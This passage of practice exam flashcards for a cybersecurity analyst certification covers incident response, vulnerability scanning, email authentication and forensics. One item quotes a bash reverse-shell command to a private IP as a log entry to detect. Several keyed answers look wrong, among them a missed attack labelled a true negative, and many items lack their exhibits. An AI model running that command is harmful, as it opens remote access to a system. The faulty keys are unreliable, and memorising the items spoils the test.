Making a forensic image of the device and creating a SHA1 hash is the best step to preserve evidence, as it creates an exact copy of the device’s data and verifies its integrity. A forensic image is a bit-by-bit copy of the device’s storage media, which preserves all the information on the device, including deleted or hidden files. A SHA1 hash is a cryptographic value that is calculated from the forensic image, which can be used to prove that the image has not been altered or tampered with. The other options are not as effective as making a forensic image and creating a SRA-I hash, as they may not capture all the relevant data, or they may not provide sufficient verification of the evidence’s authenticity.

98
Q

During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?

A. Clone the virtual server for forensic analysis.
B. Log in to the affected server and begin analysis of the logs.
C. Restore from the last known-good backup to confirm there was no loss of connectivity.
D. Shut down the affected server immediately.

A

A. Clone the virtual server for forensic analysis.

The first action that the analyst should take in this case is to clone the virtual server for forensic analysis. Cloning the virtual server involves creating an exact copy or image of the server’s data and state at a specific point in time. Cloning the virtual server can help preserve and protect any evidence or information related to the security incident, as well as prevent any tampering, contamination, or destruction of evidence. Cloning the virtual server can also allow the analyst to safely analyze and investigate the incident without affecting the original server or its operations.

99
Q

You are a penetration tester who is reviewing the system hardening guidelines for a company. Hardening guidelines indicate the following:

  • There must be one primary server or service per device.
  • Only default port should be used.
  • Non- secure protocols should be disabled.
  • The corporate internet presence should be placed in a protected subnet.

Using the available tools, discover devices on the corporate network and the services running on these devices. You must determine:

  • IP address of each device.
  • The primary server or service each device.
  • The protocols that should be disabled based on the hardening guidelines.
A
100
Q

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?

A. CVSS 3.0/AVP/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
B. CVSS 3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
C. CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
D. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

A

C. CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

101
Q

Which of the following best describes the process of requiring remediation of a known threat within a given time frame?

A. SLA
B. MOU
C. Best-effort patching
D. Organizational governance

A

A. SLA

102
Q

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

A. Deploy a CASB and enable policy enforcement.
B. Configure MFA with strict access.
C. Deploy an API gateway.
D. Enable SSO to the cloud applications.

A

A. Deploy a CASB and enable policy enforcement.

A cloud access security broker (CASB) is a tool that can help reduce the risk of shadow IT in the enterprise by providing visibility and control over cloud applications and services. A CASB can enable policy enforcement by blocking unauthorized or risky cloud applications, enforcing data loss prevention rules, encrypting sensitive data, and detecting anomalous user behavior.

103
Q

A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue?

A. Increasing training and awareness for all staff.
B. Ensuring that malicious websites cannot be visited.
C. Blocking all scripts downloaded from the internet.
D. Disabling all staff members’ ability to run downloaded applications.

A

A. Increasing training and awareness for all staff.

Increasing training and awareness for all staff is the best way to address the issue of employees being enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. This issue is an example of social engineering, which is a technique that exploits human psychology and behavior to manipulate people into performing actions or divulging information that benefit the attackers. Social engineering can take many forms, such as phishing, vishing, baiting, quid pro quo, or impersonation. The best defense against social engineering is to educate and train the staff on how to recognize and avoid common social engineering tactics.

104
Q

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

A. Conduct regular red team exercises over the application in production.
B. Ensure that all implemented coding libraries are regularly checked.
C. Use application security scanning as part of the pipeline for the CI/CD flow.
D. Implement proper input validation for any data entry form.

A

C. Use application security scanning as part of the pipeline for the CI/CD flow.

Application security scanning is a process that involves testing and analyzing applications for security vulnerabilities, such as injection flaws, broken authentication, cross-site scripting, and insecure configuration. Application security scanning can help identify and fix security issues before they become exploitable by attackers.

Using application security scanning as part of the pipeline for the continuous integration/continuous delivery (CI/CD) flow can help mitigate the problem of finding the same vulnerabilities in a critical application during security scanning. This is because application security scanning can be integrated into the development lifecycle and performed automatically and frequently as part of the CI/CD process.

105
Q

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

A. CDN
B. Vulnerability scanner
C. DNS
D. Web server

A

C. DNS

A distributed denial-of-service (DDoS) attack is a type of cyberattack that aims to overwhelm a target’s network or server with a large volume of traffic from multiple sources. A common technique for launching a DDoS attack is to compromise DNS servers, which are responsible for resolving domain names into IP addresses. By flooding DNS servers with malicious requests, attackers can disrupt the normal functioning of the internet and prevent users from accessing external SaaS resources.

106
Q

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?

A. Perform static analyses using an integrated development environment.
B. Deploy compensating controls into the environment.
C. Implement server-side logging and automatic updates.
D. Conduct regular code reviews using OWASP best practices.

A

D. Conduct regular code reviews using OWASP best practices.

Conducting regular code reviews using OWASP best practices is the most effective action to reduce risks associated with the application development. Code reviews are a systematic examination of the source code of an application to detect and fix errors, vulnerabilities, and weaknesses that may compromise the security, functionality, or performance of the application. Code reviews can help to improve the quality and security of the code, as well as to identify and remediate common security risks, such as insufficient logging capabilities. OWASP (Open Web Application Security Project) is a global nonprofit organization that provides free and open resources, tools, standards, and best practices for web application security. OWASP best practices for logging include following a common logging format and approach, logging relevant security events and data, protecting log data from unauthorized access or modification, and using log analysis and monitoring tools to detect and respond to security incidents. By following OWASP best practices for logging, developers can ensure that their web applications have sufficient and effective logging capabilities that can help to prevent, detect, and mitigate security threats.

107
Q

The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company:

Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email?

A. Vulnerability A
B. Vulnerability B
C. Vulnerability C
D. Vulnerability D

A

A. Vulnerability A

108
Q

A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

A. Deploy a WAF to the front of the application.
B. Replace the current MD5 with SHA-256.
C. Deploy an antivirus application on the hosting system.
D. Replace the MD5 with digital signatures.

A

B. Replace the current MD5 with SHA-256.

The vulnerability that the security analyst is able to exploit is a hash collision, which is a situation where two different files produce the same hash value. Hash collisions can allow an attacker to bypass the integrity or authentication checks that rely on hash values, and submit malicious files to the system. The web application uses MD5, which is a hashing algorithm that is known to be vulnerable to hash collisions. Therefore, the analyst should suggest replacing the current MD5 with SHA-256, which is a more secure and collision-resistant hashing algorithm. The other options are not the best suggestions to mitigate the vulnerability with the fewest changes to the current script and infrastructure. Deploying a WAF (web application firewall) to the front of the application (A) may help protect the web application from some common attacks, but it may not prevent hash collisions or detect malicious files. Deploying an antivirus application on the hosting system (C) may help scan and remove malicious files from the system, but it may not prevent hash collisions or block malicious files from being submitted. Replacing the MD5 with digital signatures (D) may help verify the authenticity and integrity of the files, but it may require significant changes to the current script and infrastructure, as digital signatures involve public-key cryptography and certificate authorities.

109
Q

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:

Which of the following vulnerability types is the security analyst validating?

A. Directory traversal
B. XSS
C. XXE
D. SSRF

A

C. XXE

110
Q

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

A. SIEM ingestion logs are reduced by 20%.
B. Phishing alerts drop by 20%.
C. False positive rates drop to 20%.
D. The MTTR decreases by 20%.

A

D. The MTTR decreases by 20%.

111
Q

A financial industry services firm was the victim of an internal data breach, and the perpetrator was a member of the company’s development team. During the investigation. one of the security administrators accidentally deleted the perpetrator’s user data. Even though the data is recoverable, which of the following has been violated?

A. Chain of custody
B. Evidence acquisition
C. Containment
D. Root cause analysis

A

A. Chain of custody

112
Q

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?

A. Impact
B. Vulnerability score
C. Mean time to detect
D. Isolation

A

A. Impact

113
Q

A company has the following security requirements:

  • No public IPs
  • All data secured at rest
  • No insecure ports/protocols

After a cloud scan is completed a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

A. VM_PRD_DB
B. VM_DEV_DB
C. VM_DEV_Web02
D. VM_PRD_Web01

A

A. VM_PRD_DB

114
Q

An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the best step for the security team to take to ensure compliance with the request?

A. Publicly disclose the request to other vendors.
B. Notify the departments involved to preserve potentially relevant information.
C. Establish a chain of custody starting with the attorney’s request.
D. Back up the mailboxes on the server and provide the attorney with a copy.

A

C. Establish a chain of custody starting with the attorney’s request.

115
Q

A security analyst needs to provide evidence of regular vulnerability scanning on the company’s network for an auditing process. Which of the following is an example of a tool that can produce such evidence?

A. OpenVAS
B. Burp Suite
C. Nmap
D. Wireshark

A

A. OpenVAS

116
Q

Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system application, or user base is affected by an uptime availability outage?

A. Timeline
B. Evidence
C. Impact
D. Scope

A

C. Impact

117
Q

A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?

A. Instruct the firewall engineer that a rule needs to be added to block this external server.
B. Escalate the event to an incident and notify the SOC manager of the activity.
C. Notify the incident response team that there is a DDoS attack occurring.
D. Identify the IP/hostname for the requests and look at the related activity.

A

D. Identify the IP/hostname for the requests and look at the related activity.

118
Q

A vulnerability scanner generates the following output:

The company has an SLA for patching that requires time frames to be met for high-risk vulnerabilities. Which of the following should the analyst prioritize first for remediation?

A. Oracle JDK
B. Cisco Webex
C. Redis Server
D. SSL Self-signed Certificate

A

C. Redis Server

119
Q

After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?

A. Irregular peer-to-peer communication
B. Rogue device on the network
C. Abnormal OS process behavior
D. Data exfiltration

A

D. Data exfiltration

120
Q

Which of the following actions would an analyst most likely perform after an incident has been investigated?

A. Risk assessment
B. Root cause analysis
C. Incident response plan
D. Tabletop exercise

A

B. Root cause analysis

121
Q

A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?

A. OSSTMM
B. Diamond Model of Intrusion Analysis
C. OWASP
D. MITRE ATT&CK

A

D. MITRE ATT&CK

122
Q

A new zero-day vulnerability was released. A security analyst is prioritizing which systems should receive deployment of compensating controls deployment first. The systems have been grouped into the categories shown below:

Which of the following groups should be prioritized for compensating controls?

A. Group A
B. Group B
C. Group C
D. Group D

A

C. Group C

123
Q

An organization’s threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?

A. Set user account control protection to the most restrictive level on all devices.
B. Implement MFA requirements for all internal resources.
C. Harden systems by disabling or removing unnecessary services.
D. Implement controls to block execution of untrusted applications.

A

C. Harden systems by disabling or removing unnecessary services.

124
Q

An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and the cause is traced back to the vulnerability scanner. Which of the following is the cause of this issue?

A. The scanner is running without an agent installed.
B. The scanner is running in active mode.
C. The scanner is segmented improperly.
D. The scanner is configured with a scanning window.

A

B. The scanner is running in active mode.

125
Q

An organization has deployed a cloud-based storage system for shared data that is in phase two of the data life cycle. Which of the following controls should the security team ensure are addressed? (Choose two.)

A. Data classification
B. Data destruction
C. Data loss prevention
D. Encryption
E. Backups
F. Access controls

A

D. Encryption
F. Access controls

126
Q

A recent audit of the vulnerability management program outlined the finding for increased awareness of secure coding practices. Which of the following would be best to address the finding?

A. Establish quarterly SDLC training on the top vulnerabilities for developers.
B. Conduct a yearly inspection of the code repositories and provide the report to management.
C. Hire an external penetration test of the network.
D. Deploy more vulnerability scanners for increased coverage.

A

A. Establish quarterly SDLC training on the top vulnerabilities for developers.

127
Q

Which of the following risk management principles is accomplished by purchasing cyber insurance?

A. Accept
B. Avoid
C. Mitigate
D. Transfer

A

D. Transfer

128
Q

A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of following best fits the type of scanning activity requested?

A. Uncredentialed scan
B. Discovery scan
C. Vulnerability scan
D. Credentialed scan

A

B. Discovery scan

129
Q

An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the control was unable to detect an attack with nine failed logins. Which of the following best represents what occurred?

A. False positive
B. True negative
C. False negative
D. True positive

A

B. True negative

130
Q

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?

A. Credentialed scan
B. External scan
C. Differential scan
D. Network scan

A

A. Credentialed scan

131
Q

A security analyst at a company is reviewing an alert from the file integrity monitoring indicating a mismatch in the login. html file hash. After comparing the code with the previous version of the page source code, the analyst found the following code snippet added:

Which of the following best describes the activity the analyst has observed?

A. Obfuscated links
B. Exfiltration
C. Unauthorized changes
D. Beaconing

A

C. Unauthorized changes

132
Q

A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information:

Which of the following vulnerabilities should be prioritized for remediation?

A. nessie.explosion
B. vote.4p
C. sweet.bike
D. great.skills

A

D. great.skills

133
Q

An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts?

A. Identify and discuss the lessons learned with the prior analyst.
B. Accept all findings and continue to investigate the next item target.
C. Review the steps that the previous analyst followed.
D. Validate the root cause from the prior analyst.

A

C. Review the steps that the previous analyst followed.

134
Q

The security analyst received the monthly vulnerability report. The following findings were included in the report:

  • Five of the systems only required a reboot to finalize the patch application
  • Two of the servers are running outdated operating systems and cannot be patched

The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?

A. Compensating controls
B. Due diligence
C. Maintenance windows
D. Passive discovery

A

A. Compensating controls

135
Q

A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?

A. Wipe the computer and reinstall software.
B. Shut down the email server and quarantine it from the network.
C. Acquire a bit-level image of the affected workstation.
D. Search for other mail users who have received the same file.

A

D. Search for other mail users who have received the same file.

136
Q

After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?

A. Transfer
B. Accept
C. Mitigate
D. Avoid

A

C. Mitigate

137
Q

Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?

A. Mean time to detect.
B. Mean time to respond.
C. Mean time to remediate.
D. Service-level agreement uptime

A

A. Mean time to detect.

138
Q

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?

A. Deploy a database to aggregate the logging.
B. Configure the servers to forward logs to a SIEM.
C. Share the log directory on each server to allow local access.
D. Automate the emailing of logs to the analysts.

A

B. Configure the servers to forward logs to a SIEM.

139
Q

An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?

A. Perform a tabletop drill based on previously identified incident scenarios.
B. Simulate an incident by shutting down power to the primary data center.
C. Migrate active workloads from the primary data center to the secondary location.
D. Compare the current plan to lessons learned from previous incidents.

A

A. Perform a tabletop drill based on previously identified incident scenarios.

140
Q

During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?

A. Shut down the server.
B. Reimage the server.
C. Quarantine the server.
D. Update the OS to latest version.

A

C. Quarantine the server.

141
Q

An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed?

A. Blocklisting
B. Allowlisting
C. Graylisting
D. Webhooks

A

B. Allowlisting

142
Q

During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the analyst with this information?

A. Header analysis
B. Packet capture
C. SSL inspection
D. Reverse engineering

A

A. Header analysis

143
Q

The email system administrator for an organization configured DKIM signing for all email legitimately sent by the organization. Which of the following would most likely indicate an email is malicious if the company’s domain name is used as both the sender and the recipient?

A. The message fails a DMARC check.
B. The sending IP address is the hosting provider.
C. The signature does not meet corporate standards.
D. The sender and reply address are different.

A

A. The message fails a DMARC check.

144
Q

A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?

A. Data masking
B. Hashing
C. Watermarking
D. Encoding

A

A. Data masking

145
Q

An organization’s email account was compromised by a bad actor. Given the following information:

Which of the following is the length of time the team took to detect the threat?

A. 25 minutes
B. 40 minutes
C. 45 minutes
D. 2 hours

A

A. 25 minutes

146
Q

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

A. Deploy agents on all systems to perform the scans.
B. Deploy a central scanner and perform non-credentialed scans.
C. Deploy a cloud-based scanner and perform a network scan.
D. Deploy a scanner sensor on every segment and perform credentialed scans.

A

D. Deploy a scanner sensor on every segment and perform credentialed scans.

147
Q

An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation?

A. Multifactor authentication
B. Password changes
C. System hardening
D. Password encryption

A

B. Password changes

148
Q

Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?

A. Join an information sharing and analysis center specific to the company’s industry.
B. Upload threat intelligence to the IPS in STIX’TAXII format.
C. Add data enrichment for IPs in the ingestion pipeline.
D. Review threat feeds after viewing the SIEM alert.

A

C. Add data enrichment for IPs in the ingestion pipeline.

149
Q

A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?

A. Integrate an IT service delivery ticketing system to track remediation and closure.
B. Create a compensating control item until the system can be fully patched.
C. Accept the risk and decommission current assets as end of life.
D. Request an exception and manually patch each system.

A

A. Integrate an IT service delivery ticketing system to track remediation and closure.

150
Q

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

A. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0
B. AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L - Base Score 7.2
C. AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4
D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

A

D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

151
Q

A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.)

A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level.
B. Review the headers from the forwarded email.
C. Examine the recipient address field.
D. Review the Content-Type header.
E. Evaluate the HELO or EHLO string of the connecting email server.
F. Examine the SPF, DKIM, and DMARC fields from the original email.

A

A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level.
F. Examine the SPF, DKIM, and DMARC fields from the original email.

152
Q

A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?

A. grep [IP address] packets.pcap
B. cat packets.pcap | grep [IP Address]
C. tcpdump -n -r packets.pcap host [IP address]
D. strings packets.pcap | grep [IP Address]

A

C. tcpdump -n -r packets.pcap host [IP address]

153
Q

Which of the following is the most important factor to ensure accurate incident response reporting?

A. A well-defined timeline of the events.
B. A guideline for regulatory reporting.
C. Logs from the impacted system.
D. A well-developed executive summary.

A

A. A well-defined timeline of the events.

154
Q

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

A. Nmap
B. TCPDump
C. SIEM
D. EDR

A

B. TCPDump

155
Q

A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?

A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
B. Write a removable media policy that explains that USBs cannot be connected to a company asset.
C. Check configurations to determine whether USB ports are enabled on company assets.
D. Review logs to see whether this exploitable vulnerability has already impacted the company.

A

C. Check configurations to determine whether USB ports are enabled on company assets.

156
Q

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

A. Implement segmentation with ACLs.
B. Configure logging and monitoring to the SIEM.
C. Deploy MFA to cloud storage locations.
D. Roll out an IDS.

A

A. Implement segmentation with ACLs.

157
Q

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

A. #!/bin/bash
nc 10.1.2.3 8080 -vv >dev/null && echo “Malicious activity” || echo “OK”

B. #!/bin/bash
ps -fea | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”

C. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >dev/null && echo “Malicious activity” || echo “OK”

D. #!/bin/bash
netstat -antp | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”

A

D. #!/bin/bash
netstat -antp | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”

158
Q

A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device’s operating system. Which of the following best meets this requirement?

A. SIEM
B. CASB
C. SOAR
D. EDR

A

D. EDR

159
Q

Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

A. Command and control
B. Data enrichment
C. Automation
D. Single sign-on

A

C. Automation

160
Q

Which of the following describes the best reason for conducting a root cause analysis?

A. The root cause analysis ensures that proper timelines were documented.
B. The root cause analysis allows the incident to be properly documented for reporting.
C. The root cause analysis develops recommendations to improve the process.
D. The root cause analysis identifies the contributing items that facilitated the event.

A

D. The root cause analysis identifies the contributing items that facilitated the event.

161
Q

An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?

A. Any discovered vulnerabilities will not be remediated.
B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery.
D. There are no compensating controls in place for the OS.

A

A. Any discovered vulnerabilities will not be remediated.

162
Q

An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?

A. SOAR
B. SIEM
C. SLA
D. IoC

A

A. SOAR

163
Q

An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?

A. Access rights
B. Network segmentation
C. Time synchronization
D. Invalid playbook

A

C. Time synchronization

164
Q

A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

A. Leave the proxy as is.
B. Decommission the proxy.
C. Migrate the proxy to the cloud.
D. Patch the proxy.

A

B. Decommission the proxy.

165
Q

A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?

A. Non-credentialed scanning
B. Passive scanning
C. Agent-based scanning
D. Credentialed scanning

A

B. Passive scanning

166
Q

A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?

A. Operating system version
B. Registry key values
C. Open ports
D. IP address

A

B. Registry key values

167
Q

A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://office365password.acme.co. The site’s standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?

A. This is a normal password change URL.
B. The security operations center is performing a routine password audit.
C. A new VPN gateway has been deployed.
D. A social engineering attack is underway.

A

D. A social engineering attack is underway.

168
Q

A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?

A. config.ini
B. ntds.dit
C. Master boot record
D. Registry

A

D. Registry

169
Q

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

A. Insider threat
B. Ransomware group
C. Nation-state
D. Organized crime

A

C. Nation-state

170
Q

A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?

A. SIEM
B. XDR
C. SOAR
D. EDR

A

C. SOAR

171
Q

A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:

getConnection(database01,”alpha” ,”AxTv.127GdCx94GTd”);

Which of the following is the most likely vulnerability in this system?

A. Lack of input validation
B. SQL injection
C. Hard-coded credential
D. Buffer overflow

A

C. Hard-coded credential

172
Q

An incident response team member is triaging a Linux server. The output is shown below:

Which of the following is the adversary most likely trying to do?

A. Create a backdoor root account named zsh.
B. Execute commands through an unsecured service account.
C. Send a beacon to a command-and-control server.
D. Perform a denial-of-service attack on the web server.

A

B. Execute commands through an unsecured service account.

173
Q

A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?

A. Data exfiltration
B. Rogue device
C. Scanning
D. Beaconing

A

D. Beaconing